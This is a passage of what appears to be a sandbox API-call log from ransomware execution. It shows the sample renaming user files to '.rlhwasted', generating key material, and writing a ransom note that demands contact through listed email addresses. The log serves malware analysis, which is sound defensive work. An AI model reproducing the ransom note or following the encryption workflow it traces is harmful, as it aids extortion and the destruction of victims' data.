halpmcxz\\videos\\_sopiism9trxq0w\\r_c_sqv7puslot9ion.swf.rlhwasted")) returned 1 [0198.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\R_C_sqV7puslot9IOn.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\r_c_sqv7puslot9ion.swf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0198.385] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0198.385] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xbd36 [0198.385] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbd36) returned 0x6a0000 [0198.385] CloseHandle (hObject=0x10c) returned 1 [0198.389] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0198.390] CloseHandle (hObject=0x124) returned 1 [0198.390] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x712fd0 [0198.390] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0198.391] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x713018 | out: pbBuffer=0x713018) returned 1 [0198.391] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.391] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0198.392] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0198.392] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.403] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e7988 [0198.403] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0198.403] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.403] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]W4hJ/pdqlrXNwk2TGn5YgCYD4vIYDh6LfRpxf7psUP/tiJe4vNUhos6pT9mFhhgo\r\nGE76UAagKE1sUKl59q5o41aK9ZLJOtCNZK1/KY3oNWEE/tg2ibrCfxO8CvcoKHSO\r\nuuPCYZ+pvpS7ympJpebMmOHeFE75FdGfkHAHBgIsKlKIHVlJff/hNanglMomqu05\r\nUR5aZQI8Xgzw/qqj1FBLy2/C8pLNV3uZ674vNc9qHp6TsdPuxT/fvOk0PTSEyNAO\r\nm9USd5ujmb3WV16jbrL6mLOJPimpQG4GYuXbzAoJfMDY6LgVOPf1/tgh63AoYtj3\r\nSWNvsRNnaJI9Yl6ObUTmThiYs8QQHU4x7hrzJj9xrIpbrBkcGIh0Wo3Dq5cWnKuH\r\nsJgFE7XK3Z437cq9BPzx6DL/6FD6LpcbmHUnbW+8WaVwsQh+DJcGMJdShlbb2RWo\r\nXYm0hPjDsPI1NLw/kHQYerIOKH/3FL5wo5tpNTfgRP0kxbdHS2Vc0KCjwnekNeYp\r\nWfXEl8TxonTiJdzTnFwTABAMD3ixgVz4ZKskkSWfx1IMUut8msYs5Kq33/mnDLBG\r\nrM5I0YAEhN4cc/RDevf+MnJa3oE7tz7ivnCu5P0dVnH7/0PbRK7atcR4pEN4sE1F\r\nUSSQbtRBrqeqAGzHTx+DUKHFFLe63/DP4jIQENOjgq2=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.404] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.404] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0198.404] SetEndOfFile (hFile=0x108) returned 1 [0198.407] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.407] CloseHandle (hObject=0x108) returned 1 [0198.409] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0198.409] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6feb08 | out: hHeap=0x6b0000) returned 1 [0198.409] _aulldvrm () returned 0x0 [0198.409] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0198.410] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0198.410] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.410] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\ANN7xy_5U4o6Q.avi") returned 89 [0198.410] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2bc) returned 0x70cfe8 [0198.411] lstrcpyW (in: lpString1=0x70d09a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.411] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.411] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0198.412] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0198.412] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\ANN7xy_5U4o6Q.avi.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\faxmu4ye5\\ann7xy_5u4o6q.avi.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0198.413] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0198.414] SetEndOfFile (hFile=0x108) returned 1 [0198.414] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.414] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.414] lstrcpyW (in: lpString1=0x70d09a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.414] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\ANN7xy_5U4o6Q.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\faxmu4ye5\\ann7xy_5u4o6q.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\ANN7xy_5U4o6Q.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\faxmu4ye5\\ann7xy_5u4o6q.avi.rlhwasted")) returned 1 [0198.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\ANN7xy_5U4o6Q.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\faxmu4ye5\\ann7xy_5u4o6q.avi.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0198.416] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0198.416] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x5931 [0198.416] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5931) returned 0x6a0000 [0198.416] CloseHandle (hObject=0x124) returned 1 [0198.419] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0198.419] CloseHandle (hObject=0x10c) returned 1 [0198.419] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x712fd0 [0198.419] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0198.420] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x713018 | out: pbBuffer=0x713018) returned 1 [0198.420] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.421] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0198.421] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0198.422] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.509] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.509] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0198.509] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.509] _snwprintf (in: _Dest=0x6e7988, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jBtaggtq91MOtpwqR99PFCLa8yEsKFEzFF1ZK01k4agHpQpXrxaoA5z2YSd6GStg\r\nsaZXDe1BjTByMMQm2vEb8yd+pHtm7azKZ0FcU+pGqaYZco8YXlucN6/CgqbCSeoC\r\n7tVxwaXwSz6CJlqB11jm8Cq9cYFZTA3VIRkeHwi6GsAGQ3/VJTQsfZ9M1HECQQLY\r\n1npB9meH4O/M6dijgMEWTVbLDYW+hmlR9OD3FPNVwN3PHrfKijTFu2mRmDag3AfH\r\nEk6gnSHBX4DRBbXbWls6UuS+bAJdq+hX7Zi/k4jzvbhGWIKEMJldcAGqq5sPS+zi\r\nJF7Zri25KuHecGzIWEP7ASsTOlzA/5qoLFDmK5UqGbcKGJX5kPfQ2AQ3YKds6Fhe\r\nx0lxFtstijOsl90Cu1LfKT2dZGMuWV0OeC1NDwZr460vtv37IOMs0S0MBPQqImuV\r\nJGNqtE+jjr5T4HfCmXd/YPXdalN7tnuLanIckcLXPwl7r1/E53YFuyVixpoYlFDo\r\nu/ShI8EkTOdqEPHnPym9nLLqIGSDWU6rqFizewDJXVvU8WlxgBu5kPfrAxohKiPF\r\nJ5ydXf08TONu+lgH3Neu5GKwspENgvTzH9N/YzIyLPrg9MXLM7dTzhK/m8GtMsD2\r\ncVRrhjQWNg+52T4b0quWtwr8iggMCqJ7CmFxFYNT77p=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.509] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.509] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0198.509] SetEndOfFile (hFile=0x108) returned 1 [0198.512] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.512] CloseHandle (hObject=0x108) returned 1 [0198.514] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0198.514] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x713568 | out: hHeap=0x6b0000) returned 1 [0198.514] _aulldvrm () returned 0x0 [0198.514] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0198.515] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0198.515] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.515] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\QogdvzBgE3W.mkv") returned 87 [0198.515] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b8) returned 0x6d4580 [0198.515] lstrcpyW (in: lpString1=0x6d462e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.515] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.516] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0198.517] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6e7988 | out: pbBuffer=0x6e7988) returned 1 [0198.517] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\QogdvzBgE3W.mkv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\faxmu4ye5\\qogdvzbge3w.mkv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0198.517] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0198.519] SetEndOfFile (hFile=0x108) returned 1 [0198.519] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.519] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.519] lstrcpyW (in: lpString1=0x6d462e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\QogdvzBgE3W.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\faxmu4ye5\\qogdvzbge3w.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\QogdvzBgE3W.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\faxmu4ye5\\qogdvzbge3w.mkv.rlhwasted")) returned 1 [0198.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\QogdvzBgE3W.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\ycdk\\faxmu4ye5\\qogdvzbge3w.mkv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0198.521] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0198.521] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x1341e [0198.521] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1341e) returned 0xb00000 [0198.521] CloseHandle (hObject=0x124) returned 1 [0198.528] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0198.529] CloseHandle (hObject=0x10c) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x707f58 [0198.529] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0198.530] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x707fa0 | out: pbBuffer=0x707fa0) returned 1 [0198.530] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.530] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0198.531] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0198.531] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.626] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.626] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x707f58 | out: hHeap=0x6b0000) returned 1 [0198.626] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0198.627] _snwprintf (in: _Dest=0x6fcd40, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JWWrhGA/KYgeKEDpEkUYIbfqnm+LspUF5HqVFy56Wz8pOAGNwC1dsp8DbglekEzq\r\n1jCQNNfDYOC4hWUvOMbgBUzjsiHpmuhMEgqjU9rdHg1hJCIFye/LRfA29LQhqa+E\r\nmKQH7qWeKxhtRMgdiX6eyUIf1otvWYwdxVb+rTwM7qCAe7R4cLo0Ke79QWVcsBVK\r\nCAK2wxKhrprU6ulyj9STeaSCl9NXcSKqOE01UpkETWaaoRPuV0kQeLRTxQB2xUQv\r\nFXWg/K9rj1LCJ4cTZAjYQOTWpFTKKvZRFHxRQxgpPNmsgXQ8M1hNKlmC9FsJnUBl\r\nOYebRGHhDM8+OqY0lEzBy4gIaXYmwBbil1kCcOAdmeCs8QqAapjBnbTAJLXh8hQj\r\n3GDl+rqgu1X4aeLAlf+IwDfaSyKFY5erJTp65zygc3Kq2E9zOl19tJMsLtGUASOP\r\nwDiZA5kBxC4FlEPj2rTJHLcTC67YromQPqIg6w1FXtmsLCKPNie12B/vzIGRVIqO\r\nPb86yHnX1lh+k829zVV47/IcQ/e5ceqqmhph/6VEx7hg34Wr0FYSTsnOslc1RF4N\r\nuT2dqqhC//row/kVcgQ1bi2wI/PZsCkN8QBIfS97oQmqd+0TKPVIGLEDtkrqNCND\r\n/uefz08IKAyd/SEWs4AjF6tWXEponNs0byi2Qjpvppp=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.627] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.627] WriteFile (in: hFile=0x108, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0198.661] SetEndOfFile (hFile=0x108) returned 1 [0198.663] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0198.663] CloseHandle (hObject=0x108) returned 1 [0198.673] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x713678 | out: hHeap=0x6b0000) returned 1 [0198.673] _aulldvrm () returned 0x0 [0198.673] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0198.674] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0198.674] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.674] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0198.674] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x270) returned 0x707f58 [0198.674] lstrcpyW (in: lpString1=0x707fbe, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.674] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0198.674] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0198.675] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6fcd40 | out: pbBuffer=0x6fcd40) returned 1 [0198.675] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.rlhwasted_info" (normalized: "c:\\users\\default\\contacts\\administrator.contact.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0198.676] WriteFile (in: hFile=0x108, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0198.677] SetEndOfFile (hFile=0x108) returned 1 [0198.677] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.677] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0198.677] lstrcpyW (in: lpString1=0x707fbe, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.677] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.rlhwasted" (normalized: "c:\\users\\default\\contacts\\administrator.contact.rlhwasted")) returned 1 [0198.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.rlhwasted" (normalized: "c:\\users\\default\\contacts\\administrator.contact.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0198.678] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0198.678] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x10b1e [0198.678] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b1e) returned 0xb00000 [0198.678] CloseHandle (hObject=0x124) returned 1 [0198.683] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0198.683] CloseHandle (hObject=0x10c) returned 1 [0198.683] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.683] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0198.684] CryptGenRandom (in: hProv=0x6f4f10, 